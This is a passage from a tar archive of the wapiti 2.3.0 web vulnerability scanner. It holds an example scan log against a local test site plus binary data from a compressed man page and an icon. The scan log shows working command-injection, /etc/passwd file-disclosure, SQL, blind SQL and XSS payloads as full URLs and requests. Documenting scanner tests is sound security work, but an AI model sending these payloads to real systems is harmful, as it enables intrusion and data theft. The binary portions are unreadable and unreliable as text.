(&N,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z*W 9#)I)U,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z(S )S 4]+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z&Ns ?q+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y#H {m *#H+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y Cw e?#>'O+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y=l[ g /T)U,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y+X)U)U+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y6aOk >o+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+X"G~.Q +  #> Bv+X,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y/SKq 1&N,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z(S0V  #"F~,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y'FKy/T*W,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y:g3\+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z)T 9M#G,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z4]/S+Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y;jW*K*W,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z(S=m,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y&N /e/$J,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z7b *V,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y@r uW8d+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z'F!Cx,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y$K8%B*V,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z%B.S,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z)T=m -I ('P,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z0V#?,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Y)U?r!< ;i+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z!DyPwQy  1,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y%M8d3  m '#G,Z,Z,Z,Z,Z,Z,Z,Z*W 6Px__Lq (,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y&N:g#?  %4];i  9 ."G+Z,Z,Z,Z,Z,Z+Y/T ( s3..EhHlX^^*>] ,&O$J#G!Cx>o:h7c3Z,N(G"= 2 %  9' !1.Df9T~u  Gu /o7 ?gyoe]WWWWWSK5  %;O[iqwyyske]QC5%wapiti-2.3.0+dfsg/doc/example.txt000066400000000000000000000245021240201516300166660ustar00rootroot00000000000000First, I use wapiti-getcookie to login in the restricted area and get the cookie in cookies.json : bash-4.2$ python bin/wapiti-getcookie /tmp/cookies.json http://127.0.0.1/vuln/login.php Please enter values for the following form: url = http://127.0.0.1/vuln/login.php username (default) : admin password (letmein) : secret It can also be done with wapiti-cookie this way : python bin/wapiti-cookie /tmp/cookies.json http://127.0.0.1/vuln/login.php username=admin password=secret Then, I scan the vulnerable website using the cookie and excluding the logout script : bash-4.2$ wapiti http://127.0.0.1/vuln/ -c cookies.json -x http://127.0.0.1/vuln/logout.php Wapiti-2.3.0 (wapiti.sourceforge.net) Note ======== This scan has been saved in the file /home/audit/.wapiti/scans/127.0.0.1.xml You can use it to perform attacks without scanning again the web site with the "-k" parameter [*] Loading modules: mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto [+] Launching module exec Command execution in http://127.0.0.1/vuln/exec/system.php via injection in the parameter host Evil url: http://127.0.0.1/vuln/exec/system.php?host=%3Benv Command execution in http://127.0.0.1/vuln/exec/passthru.php via injection in the parameter host Evil url: http://127.0.0.1/vuln/exec/passthru.php?host=%3Benv Timeout occured in http://127.0.0.1/vuln/exec/shell_exec.php Evil url: http://127.0.0.1/vuln/exec/shell_exec.php?host=a%60sleep%20600%60 Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%3Benv PHP evaluation in http://127.0.0.1/vuln/exec/eval.php via injection in the parameter code Evil url: http://127.0.0.1/vuln/exec/eval.php?code=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F [+] Launching module file Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%2Fetc%2Fpasswd Linux local file disclosure vulnerability in http://127.0.0.1/vuln/include/include_get_simple.php via injection in the parameter f Evil url: http://127.0.0.1/vuln/include/include_get_simple.php?f=%2Fetc%2Fpasswd File disclosure vulnerability in include_path in http://127.0.0.1/vuln/include/readfile_get_simple.php via injection in the parameter f Evil url: http://127.0.0.1/vuln/include/readfile_get_simple.php?f=.depdb Linux local file disclosure vulnerability in http://127.0.0.1/vuln/include/include_get_post_conditional.php?id=2 via injection in the parameter f Evil request: POST /vuln/include/include_get_post_conditional.php?id=2 HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/include/include_get_post_conditional.php?id=2 Content-Type: application/x-www-form-urlencoded f=%2Fetc%2Fpasswd [+] Launching module sql Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%BF%27%22%28 MySQL Injection in http://127.0.0.1/vuln/sql/login.php via injection in the parameter login Evil url: http://127.0.0.1/vuln/sql/login.php?login=%BF%27%22%28&password=test MySQL Injection in http://127.0.0.1/vuln/sql/login.php via injection in the parameter password Evil url: http://127.0.0.1/vuln/sql/login.php?login=test&password=%BF%27%22%28 MySQL Injection in http://127.0.0.1/vuln/sql/login_post.php via injection in the parameter login Evil request: POST /vuln/sql/login_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post.php Content-Type: application/x-www-form-urlencoded login=%BF%27%22%28&password=letmein MySQL Injection in http://127.0.0.1/vuln/sql/login_post.php via injection in the parameter password Evil request: POST /vuln/sql/login_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post.php Content-Type: application/x-www-form-urlencoded login=default&password=%BF%27%22%28 [+] Launching module xss XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get.php?firstname=James&vuln=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27w3xanau7e6%27%29%3C%2Fscript%3E&lastname=Bond XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_text_script.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get_text_script.php?vuln=String.fromCharCode%280%2Cwv503afd6b%2C1%29 XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_noscript.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get_noscript.php?vuln=%3C%2Ftextarea%3E%3C%2Fp%3E%3C%2Fdiv%3E%3C%2Fnoscript%3E%3Cscript%3Ealert%28%27wfalvx3r3y%27%29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_if_cond.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get_if_cond.php?vuln=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27wjl4df7rtf%27%29%3C%2Fscript%3E&id=2 XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_query_string.php via injection in the query string Evil url: http://127.0.0.1/vuln/xss/xss_in_query_string.php?%3Cscript%3Ealert%28%27w1jnjlqhnq%27%29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_php_self.php via injection in the resource path Evil url: http://127.0.0.1/vuln/xss/xss_in_php_self.php/%3Cscript%3Ephpselfxss()%3C/script%3E XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wrb6hruotv%27%29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_post.php via injection in the parameter vuln Evil request: POST /vuln/xss/xss_in_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/xss_in_post.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27w1f181ucnr%27%29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post_direct.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wz00qm40jx%27%29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_post_url.php?style=%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28%27wpk5q4ybjo%27%29%3C%2Fscript%3E via injection in the parameter style Evil request: POST /vuln/xss/xss_in_post_url.php?style=%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28%27wpk5q4ybjo%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/xss_in_post_url.php Content-Type: application/x-www-form-urlencoded username=Enter%20your%20username [+] Launching module blindsql Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=sleep%287%29%231 Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_blind.php via injection in the parameter login Evil url: http://127.0.0.1/vuln/sql/login_blind.php?login=%27%20or%20sleep%287%29%231&password=test Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_blind.php via injection in the parameter password Evil url: http://127.0.0.1/vuln/sql/login_blind.php?login=test&password=%27%20or%20sleep%287%29%231 Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_post_blind.php via injection in the parameter login Evil request: POST /vuln/sql/login_post_blind.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post_blind.php Content-Type: application/x-www-form-urlencoded login=%27%20or%20sleep%287%29%231&password=letmein Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_post_blind.php via injection in the parameter password Evil request: POST /vuln/sql/login_post_blind.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post_blind.php Content-Type: application/x-www-form-urlencoded login=default&password=%27%20or%20sleep%287%29%231 [+] Launching module permanentxss Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27w1rc0mzxmd%27%29%3C%2Fscript%3E Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post_direct.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wz00qm40jx%27%29%3C%2Fscript%3E Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get.php?firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27we37lsoicn%27%29%3C%2Fscript%3E Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname=James&lastname=Bond&vuln=wrb6hruotv Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname=James&lastname=Bond&vuln=wrb6hruotv Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_result_elsewhere_submit.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post_result_elsewhere_submit.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_result_elsewhere.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wewjm7d17s%27%29%3C%2Fscript%3E Report ------ A report has been generated in the file /home/audit/.wapiti/generated_report Open /home/audit/.wapiti/generated_report/index.html with a browser to see this report. wapiti-2.3.0+dfsg/doc/wapiti.1.gz000066400000000000000000000044121240201516300164660ustar00rootroot00000000000000cRwapiti.1X]o}ׯ`l#d`a4]8VIN6$9!ǖ{w@>Ȗ8+nd. VbeK7J|ZU%~,SX{#6g''٪L WDt?i3_a'?I-, IcerUʥ6KdBbXd:;l2Y|?&hr;'/f#^Jc;[ oR9N%UIJMsн,;#/ U­̉xi]6*'rU 8 "@-=_V^rc|a[hh%d IacstX 4U.Ui./Ufžo(X[=_J@GtxQ jЃGi*,ΘZiV딏nF\qjsw31M>V Zy.м:_JENG7"1 c%M~/PȂ#~U8C[M3K%=;zv=dx%Rv s x[ڈF𛖈 ENs1B~a)#>DdFߞ, p/0$EE滆 ‰wjCDBtюt#f!߂|/ ƽd,.EZWl﫭J i>~tw^i4OŲoBo*rҶr9(!fLc͉z&058MJ'Z}MC1 oAx[`64-EWҪ؇|_)/2'\QCÈoQ(Uub,+C XlzcY@4s_(D|Kc[>hi]Ïq/c_xOxie_9CMj8`m_m]CZR3χ:<~WP(22? `<_,8Mo3#(hGvv*Gh`k%o~[ ˽O?1\m-3[ۏm=ȳ^TӳW1q#R0-:=vP/k\_oH؅*=;4.v6f?+G8\x11] o/")S,,W*KZ\2w5`a{,.%ϣ۫ ~Ѡ6FW ]KwoO|/n5Py4`p\i|)Pۯ :u">]p:-P3#*T{ڵP\v>_Hpq]ڪo_P&ޒ@^E02Dtv!nRMa@q: @6oSwapiti-2.3.0+dfsg/doc/wapiti.ico000066400000000000000000012615361240201516300164760ustar00rootroot00000000000000 ( V (~ 00 %(  NN h^( <\t~vdRB$>N`rvbD&B|4$lTn v   % $ 0 0 0 0 0 0 0 , + + + ) % "  lB   ! % ( + + + + 0 0 0 0 0 0 0 % ! > 4)I-P-P-P-P-P+L7 $-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P+M%A2d  ,#>)J-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P / 7 7-P-P-P-P-P+M!: $ > .,N-P-P-P-P-P-P-P-P-P2 #-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,O 8 l2 0+L-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P / 7 #>-P-P-P-P-P-P-P-P-P 9 5-P-P-P-P-P-P-P-P-P-P-P - $-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-O*J-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P , 7(G-P-P-P-P-P-P-P-P-P-P'E>L -P-P-P-P-P-P-P-P-P-P-P-P # ' -P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P+M 6%B-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P ( 1-P-P-P-P-P-P-P-P-P-P-P-P 'p -P-P-P-P-P-P-P-P-P-P-P-P *  *-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P # & -P-P-P-P-P-P-P-P-P-P-P-P4v !-P-P-P-P-P-P-P-P-P-P-P-P!; . -P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P -P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P   '-P-P-P-P-P-P-P-P-P-P-P-P6h-P-P-P-P-P-P-P-P-P-P-P-P*K2-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P  %7-P-P-P-P-P-P-P-P-P-P-P-P2V-P-P-P-P-P-P-P-P-P-P-P-P-P  &)I-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P  &7 9"<"<!:77 /,O-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P (+L-P-P-P-P-P-P-P-P-P-P-P-P -4 -P-P-P-P-P-P-P-P-P-P-P-P-P - $@-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P(F/R/R/R/R/R/R/R/R &D-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P !t ,N-P-P-P-P-P-P-P-P-P-P-P-P)H 4-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P+L.Q/R/R/R/R/R/R/R/R 7-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P)H 4-P-P-P-P-P-P-P-P-P-P-P-P-P L#>-P-P-P-P-P-P-P-P-P-P-P-P-P  (-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P!: /R/R/R/R/R/R/R/R/R ' &-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P"<+L-P-P-P-P-P-P-P-P-P-P-P-P,N *-P-P-P-P-P-P-P-P-P-P-P-P-P3-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P % (/R/R/R/R/R/R/R/R/R#= -P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P 0-P-P-P-P-P-P-P-P-P-P-P-P-P#>J-P-P-P-P-P-P-P-P-P-P-P-P-P,N  -P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P $?/R/R/R/R/R/R/R/R/R.P'F-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P  &C-P-P-P-P-P-P-P-P-P-P-P-P-P #$@-P-P-P-P-P-P-P-P-P-P-P-P-P ,*K-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P!; /Q/R/R/R/R/R/R/R/R/R/R '-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P  -P-P-P-P-P-P-P-P-P-P-P-P-P,M2-P-P-P-P-P-P-P-P-P-P-P-P-P+M "<-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P  (/R/R/R/R/R/R/R/R/R/R/R"<+L-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,N%A-P-P-P-P-P-P-P-P-P-P-P-P-P .,%B-P-P-P-P-P-P-P-P-P-P-P-P-P3 ,-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P#>)G/R/R/R/R/R/R/R/R/R/R/R/Q *-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P$@ -P-P-P-P-P-P-P-P-P-P-P-P-P,M n -P-P-P-P-P-P-P-P-P-P-P-P-P-P  -P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,O /R/R/R/R/R/R/R/R/R/R/R/R/R2(G-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P .)I-P-P-P-P-P-P-P-P-P-P-P-P-P '22-P-P-P-P-P-P-P-P-P-P-P-P-P'F-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P -(F/R/R/R/R/R/R/R/R/R/R/R/R/R.P -P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P 6-P-P-P-P-P-P-P-P-P-P-P-P-P&Cn&C-P-P-P-P-P-P-P-P-P-P-P-P-P5-O-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P$@ '/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R"; /-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P -P-P-P-P-P-P-P-P-P-P-P-P-P+M *K-P-P-P-P-P-P-P-P-P-P-P-P-P # (-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P)I  -O/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R#?-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P 9  ,O-P-P-P-P-P-P-P-P-P-P-P-P-P68 +M-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P*K 'D/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R-N %B-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P &rD +M-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P*K 5/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R'D%B-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P 'z )J-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P(H //R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R%@"=-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,O   # "<-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P 9 ./R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R$> ,-O-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P'F ",N/R2)I-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P(G7/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R'D  #>-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,N ) !-Q '82 ,/R/R/R/R&B  $(G-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P'F "'D/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R,M#=-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P+M - 5/R/R/R 9TH 8/R/R/R/R/R/R-N 5+L-P-P-P-P-P-P-P-P-P-P-P-P*K3  #.O/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R1 ,(G-P-P-P-P-P-P-P-P-P-P-P-P,O"<  )G/R/R/R/R/R&C rT%A/R/R/R/R/R/R/R/R/R$?   $ 1!;$@&D&D$@!: 0 #  &B/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R/R*J  - 8#?%B'E$@"=4 ' 3/R/R/R/R/R/R/R/R*I \ (G/R/R/R/R/R/R/R/R/R/R/R/Q 8  